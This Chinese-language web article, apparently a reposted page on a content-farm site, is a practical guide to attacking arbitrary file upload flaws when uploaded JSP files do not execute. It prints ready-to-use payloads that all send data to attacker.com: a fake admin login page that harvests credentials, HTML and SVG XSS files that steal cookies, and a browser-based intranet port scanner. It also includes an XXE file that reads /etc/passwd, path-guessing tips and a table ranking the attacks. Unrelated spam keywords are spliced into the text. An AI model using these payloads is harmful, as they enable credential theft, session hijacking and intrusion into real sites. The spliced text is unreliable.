您现在的位置是:物联网 >>正文
任意文件上传但 JSP 失效?别急,文件上传还有这些隐藏玩法!
物联网26936人已围观
简介一、漏洞背景目标系统存在任意文件上传漏洞,攻击者可以上传任意类型的文件,包括.jsp、.html、.js等。但:.jsp虽可上传,但无法执行可能情况:Web 服务器不解析 JSP、权限限制、文件路径未 ...
一 、任意漏洞背景
目标系统存在任意文件上传漏洞 ,文件文件玩法攻击者可以上传任意类型的上传失效上传文件 ,包括 .jsp、别急.html 、隐藏.js 等。任意但:
.jsp 虽可上传 ,文件文件玩法但 无法执行(可能情况 :Web 服务器不解析 JSP 、上传失效上传权限限制 、别急文件路径未知等) 。隐藏文件真实路径已知,任意上传后文件访问不解析执行。文件文件玩法不能依赖传统的上传失效上传 WebShell 方式上线或执行命令。那么,别急此时我们还能做什么呢?隐藏以下是模板下载完整的实战指南。

二、核心目标
即使无法执行服务器端脚本 ,任意文件上传仍具备以下潜力 :
信息扩大与目标侦察诱导型攻击(钓鱼/社工)辅助其他漏洞链构建(如 XSS、LFI、XXE 等)三 、利用方式与可行性分析
1. 上传 HTML + JS 页面诱导访问(钓鱼攻击)思路: 上传恶意 HTML 页面,诱导管理员点击访问,执行 JS 代码 ,实现 XSS、信息收集或内网探测 。
示例 :上传诱导页面 login.html
复制<!-- fake_admin_login.html --> <html> <body> <h2>后台登录已超时,请重新登录</h2> <form action="http://attacker.com/collect" method="POST"> 用户名:<input name="user"><br> 密码 :<input type="password" name="pass"><br> <input type="submit" value="登录"> </form> </body> </html>1.2.3.4.5.6.7.8.9.10.11.利用方式 :
上传该文件,设为 login.html发送钓鱼链接到管理员或目标用户(如:https://target.com/uploads/login.html)等待凭据提交到攻击者服务器2. 注入型 HTML/JS 页面 -> XSS 脚本执行思路: 上传带有 XSS Payload 的 .html, .svg, .js 文件 ,免费模板诱导访问即触发脚本。
示例:xss.html
复制<html> <body> <script> fetch("http://attacker.com/collect?cookie=" + document.cookie); </script> <h1>加载中...</h1> </body> </html>1.2.3.4.5.6.7.8.利用方式 :
上传 xss.html访问链接诱导管理员点击(或目标系统自动加载 HTML 页面如日志 、图像、文档)自动发送管理员 Cookie 给攻击者,实现后台会话劫持3. SVG 文件 XSS 利用(绕过限制)思路 : SVG 是合法图像格式,支持嵌入脚本,可绕过部分上传限制系统 。
示例:xss.svg
复制<svg xmlns="http://www.w3.org/2000/svg" onload="fetch(https://attacker.com/log?c=+document.cookie)"> <circle cx="100" cy="100" r="50" fill="blue"/> </svg>1.2.3.利用方式:
上传 xss.svg如果有“文件预览” 、“图像查看”功能 ,管理员点击查看时即被触发4. 利用上传文件进行内网信息收集(诱导扫描)思路: 上传 JS 页面诱导用户浏览器请求内网地址 ,攻击者据此确认内网结构 。
示例 :intranet_scan.html
复制<script> const ports = [80, 8080, 5000, 8000]; const subnet = "192.168.1."; for (let i = 1; i <= 254; i++) { ports.forEach(port => { let target = `http://${ subnet}${ i}:${ port}`; fetch(target, { mode: no-cors }).then(() => { fetch("http://attacker.com/log?host=" + encodeURIComponent(target)); // 结果返回 }); }); } </script>1.2.3.4.5.6.7.8.9.10.11.12.利用方式:
诱导管理员或内部用户访问上传页面浏览器触发内网请求攻击者服务器接收成功请求,获得内网 IP 存活资产5. 恶意 XML / JSON 文件触发 XXE / 配置注入思路 : 某些系统会解析上传的 XML/JSON 文件 ,若未安全配置,源码库可能触发 XXE 或 JSON 配置注入 。
示例:evil.xml
复制<?xml version="1.0"?> <!DOCTYPE root [ <!ENTITY xxe SYSTEM"file:///etc/passwd"> ]> <root>&xxe;</root>1.2.3.4.5.利用方式 :
上传该 XML 文件(如配置文件 、报告模板等)等待系统解析并反馈结果若 XXE 存在,攻击者能获取服务器本地文件内容6. 文件覆盖 / 配置污染(需路径可控)思路 : 若上传路径可控或服务端目录结构可探测,尝试覆盖配置文件、JS 文件、日志文件等。
比如:
覆盖 .js 文件供前端加载覆盖 Nginx 配置或 Spring YAML 配置(若应用会加载上传的配置)四、如何获取文件真实路径
1. 响应内容回显分析大多数文件上传接口在上传成功后会返回响应信息,其中可能包含如下内容:
文件的访问路径(绝对或相对){ "url":"/upload/imgs/abc.jpg"}存储路径或文件名{ "filePath":"C:\\web\\uploads\\abc.jsp"}上传后的文件名(可用于拼接路径){ "file":"abc.jsp"}建议 :详细分析响应体中的 JSON、HTML 、Headers,云计算尤其是如 url 、path、location 字段 。
2. 功能页面自动引用上传文件有些上传功能会直接在前端页面或后端逻辑中使用上传的文件 ,例如 :
上传头像后,在用户详情页自动加载该图片上传合同后,在某个预览地址中通过真实路径访问文件富文本上传图片后,在文章编辑区预览建议 :
上传文件后观察是否有图片、音频、PDF 等自动加载;监听是否有新请求发起 ,URL 中可能就含有真实路径;若返回 img src 、iframe、建站模板object 标签,路径常嵌入其中。3. 路径猜解与探测(信息有限时)若以上两种方式都失败 ,就只能根据已有线索猜测路径或进行探测 。例如 :
(1) 根据上传接口的路径推断访问路径 :
上传接口为 /api/upload/image通常可猜测访问路径可能为 /static/upload/image/xxx.png(2) 常见路径规则尝试:
/uploads//userfiles//static//assets/upload//files/(3) 使用目录扫描工具(如 dirsearch)配合上传文件名进行路径爆破。
(4) 结合响应文件名构造路径:
/upload/abc.jpg/uploads/images/abc.jpg返回了文件名 abc.jpg ,你可以尝试 :注意 :猜测路径时尽量使用时间戳 、UUID、用户ID等组合逻辑 ,还可结合源码 、JS 、路径泄漏等辅助信息。
五、总结
不要一开始就死磕 .jsp 的执行尽量从业务功能角度多思考上传的服务器租用文件 ,如何被使用、包含或处理善用 HTML + JS 组合的诱导和信息获取能力一旦能访问上传文件,钓鱼 + XSS 是最快获取权限的方式之一利用方式
文件类型
目标效果
难度
附加条件
HTML 钓鱼/社工
.html
获取凭据,诱导访问
⭐
用户配合/诱导
JS 扫描脚本
.js
/.html
内网探测/信息泄露
⭐⭐
管理员需访问
XSS 攻击
.html
/.svg
打 Cookie,后台劫持会话
⭐⭐⭐
浏览器解析+诱导点击
XXE 注入
.xml
读取服务器文件
⭐⭐⭐
服务端解析器需存在 XXE 漏洞
SVG 绕过上传限制
.svg
图像预览时触发
⭐⭐
图像可预览/自动渲染
配置覆盖攻击
任意
覆盖 JS/config ,污染执行点
⭐⭐⭐⭐
上传路径可控
Tags:
转载:欢迎各位朋友分享到网络,但转载请说明文章出处“商站动力”。http://www.noorid.com/html/131b499864.html
相关文章
保障网络版防火墙系统可用性的三个关键要素
物联网在企业网络安全建设中,部署防火墙系统仍然是最基础的防护手段之一。随着企业组织数字化业务转型的加快,网络安全人员认识到传统的网络防火墙系统需要一些新的转变,才能跟上企业应用需求的发展:敏捷性要求,网络安 ...
【物联网】
阅读更多新型 YouPorn 勒索骗局出现,威胁要泄露用户性爱录像带
物联网Bleeping Computer 网站披露,伪装成来自成人网站 YouPorn 电子邮件的色情勒索短信正在疯狂传播,网络犯罪分子声称受害者的色情视频已被上传到该成人网站,建议其付费删除。“色情电子邮 ...
【物联网】
阅读更多搜狗拼音输入法加密漏洞暴露用户输入
物联网搜狗拼音输入法加密系统爆安全漏洞可暴露用户输入。搜狗输入法是国内排名第一的输入法,有超过4.55亿月活用户,支持Windows、安卓、iOS、Linux等系统。搜狗拼音输入法加密漏洞暴露用户输入加拿大 ...
【物联网】
阅读更多
热门文章
最新文章
友情链接
- 小米Note2(小米Note2在市场上受到广泛关注,销量持续飙升)
- 使用最新版U盘装Win7系统教程(轻松安装最新版Win7系统的详细步骤)
- Android M怎么样?
- 探索Nowallprime的性(无墙壁体验的未来——Nowallprime的突破性创新)
- 威刚UV150的优势及性能测评(一款可靠高效的存储解决方案)
- 联想B41-80优盘安装系统教程(快速、简单地为联想B41-80电脑安装操作系统)
- 酷派8298A01(一款令人惊艳的智能手机,助力你潮流尽显个性)
- 2021年显卡性价比排行榜(显卡巅峰战)
- 三星Galaxy J5如何开启预览文本
- 华硕BIOS恢复出厂设置图解(详解华硕BIOS恢复出厂设置步骤,让您轻松搞定电脑故障) 云服务器香港物理机网站建设b2b信息平台亿华云源码库企业服务器